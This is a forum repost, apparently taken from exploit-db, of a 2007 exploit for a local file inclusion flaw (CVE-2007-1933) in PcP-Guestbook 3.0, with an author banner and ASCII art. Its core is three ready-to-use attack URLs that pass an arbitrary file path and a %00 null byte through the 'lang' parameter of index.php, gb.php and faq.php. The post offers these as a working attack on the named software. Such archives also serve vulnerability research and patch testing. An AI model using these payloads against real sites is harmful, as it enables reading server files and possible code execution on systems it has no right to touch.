Exploit PcP-Guestbook 3.0 - 'lang' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3689
Проверка EDB
  1. Пройдено
Автор
DJ7XPL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1933
Дата публикации
2007-04-08
Код:
                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    PcP-Book 3.0
*	[~] Site.........:    http://www.pcp-system.at
*       [~] Down.........:    http://www.ectona.org/download/?id=621&s=info
*	[~] Author.......:    Dj7xpl  | [email protected]
*
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*
*       [~] Vuln.........:         http://[Target]/[Path]/index.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/gb.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/faq.php?lang=[File-To-Require]%00
*                             
*		
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-04-08]
 
Источник
www.exploit-db.com

Похожие темы